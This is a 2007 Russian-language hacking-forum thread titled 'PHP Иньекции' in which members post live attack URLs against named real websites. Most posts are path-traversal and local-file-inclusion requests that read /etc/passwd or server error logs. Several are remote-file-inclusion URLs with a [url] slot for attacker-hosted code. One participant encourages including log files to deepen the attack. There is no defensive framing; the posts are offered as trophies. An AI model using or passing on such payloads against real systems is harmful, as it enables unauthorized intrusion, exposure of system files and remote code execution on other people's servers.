PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

  1. InferNo23

    InferNo23 Elder - Старейшина

    Joined:
    5 Sep 2006
    Messages:
    183
    Likes Received:
    126
    Reputations:
    42
    в сорце:
    Code:
    <frame src="тут адрес" name="mainFrame">
    просто вставка фрейма с твоим адресом, не иньекция


    Code:
    http://pythonlib.pergamen.hu/examples/index.php?p=../../../../../../etc/passwd
     
  2. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Локальные инклуды
     
    #42 NOmeR1, 24 Apr 2007
    Last edited: 24 Apr 2007
    1 person likes this.
  3. zl0ba

    zl0ba ПсихолоГ

    Joined:
    10 Oct 2006
    Messages:
    393
    Likes Received:
    301
    Reputations:
    52
    Code:
    http://oechorus.org/index.php3?incl=/etc/passwd
    Code:
    http://www.teckel-rueden.de/main.php3?main=/etc/passwd
     
  4. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Немного не PHP Injection, но бага
    Локальные инклуды (Здесь мноооого чего):
    Для тех, кто знает китайский, удалённый инклуд:
     
    #44 NOmeR1, 24 Apr 2007
    Last edited: 24 Apr 2007
    1 person likes this.
  5. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Локальные:
    Удалённые:
     
    #45 NOmeR1, 24 Apr 2007
    Last edited: 24 Apr 2007
  6. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Было бы иентереснее если при вы давали в инклуде логи как
    error_log
    access_log
    ftp_log
    etc....

    Следсвенно буду ставить полююсы.
    Показывайте что вы не просто банально можете подставить
    Ну а еще понимаете данный вид атаки до конца.
     
  7. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    2 [ cash ] - ok
    поехали:
    Code:
    http://www.earthburg.ru/earthadm/php/process.php?lang=r&c1=10&id=1&file=../../../error_log
     
    1 person likes this.
  8. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    =\
     
  9. VampiRUS

    VampiRUS Elder - Старейшина

    Joined:
    31 Dec 2005
    Messages:
    210
    Likes Received:
    105
    Reputations:
    57
    Code:
    http://www.sembiz.com/index.php?addr=[url]
    
     
    1 person likes this.
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    сохраняем и открываем
     
  11. [dword]

    [dword] Elder - Старейшина

    Joined:
    11 Apr 2007
    Messages:
    109
    Likes Received:
    74
    Reputations:
    40
    Code:
    http://www.take2games.com/index.php?p=[url]
    
     
  12. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Локал на .edu
     
    1 person likes this.
  13. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    мда... ксс там тоже есть

    Code:
    http://www.clustertech.com.cn/cn/main.php?file=/etc/passwd
    
    http://www.clustertech.com.cn/cn/main.php?file=[any url]
    
     
    1 person likes this.
  14. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    XND IT Security :)

    http://xndits.ru/index.php?module=articles&c=../../../../../etc/passwd&b=11&a=13
     
    #54 SWAT, 25 Apr 2007
    Last edited: 25 Apr 2007
  15. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Вот
     
  16. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Чёто настроения нет :) :)
     
    1 person likes this.
  17. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    Ну наконец то PHP-inj! то все скуль да скуль! :)
    Code:
    http://www.hclada.ru/turnir11/2005/index.php?c=[COLOR=DarkOrange][url][/COLOR]
    
    http://proficonsult.ru/newsnum.php?num=[COLOR=DarkOrange][url][/COLOR]
    
    http://www.webinfo.pp.ru/rezept/cons/index.php?page=[COLOR=DarkOrange][url][/COLOR]
    
    http://kompressometr.ru/?r=[COLOR=DarkOrange][url][/COLOR]
     
    #57 +StArT+, 27 Apr 2007
    Last edited: 27 Apr 2007
    2 people like this.
  18. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Code:
    http://catalog.elra.info/product_info.php?action=download&filename=../../../../../../../../../../etc/passwd
     
    1 person likes this.
  19. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Code:
    http://www.vdv.crimea.ua/td/show_art.php3?filename=../../../../../../../../../../etc/passwd
    http://www.rero.ch/pdfview.php?section=fiche&filename=../../../../../../../../../../etc/passwd
    
     
    #59 Xszz, 27 Apr 2007
    Last edited: 27 Apr 2007
    1 person likes this.
  20. Xszz

    Xszz Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    141
    Likes Received:
    42
    Reputations:
    9
    Code:
    http://www.tranceradio.ch/autohtml.php?filename=../../../../../../../../../../etc/passwd
    http://rubyweaver.gilluminate.com/download.php?filename=../../../../../../../../../../etc/passwd
    
     
    #60 Xszz, 27 Apr 2007
    Last edited: 27 Apr 2007
    2 people like this.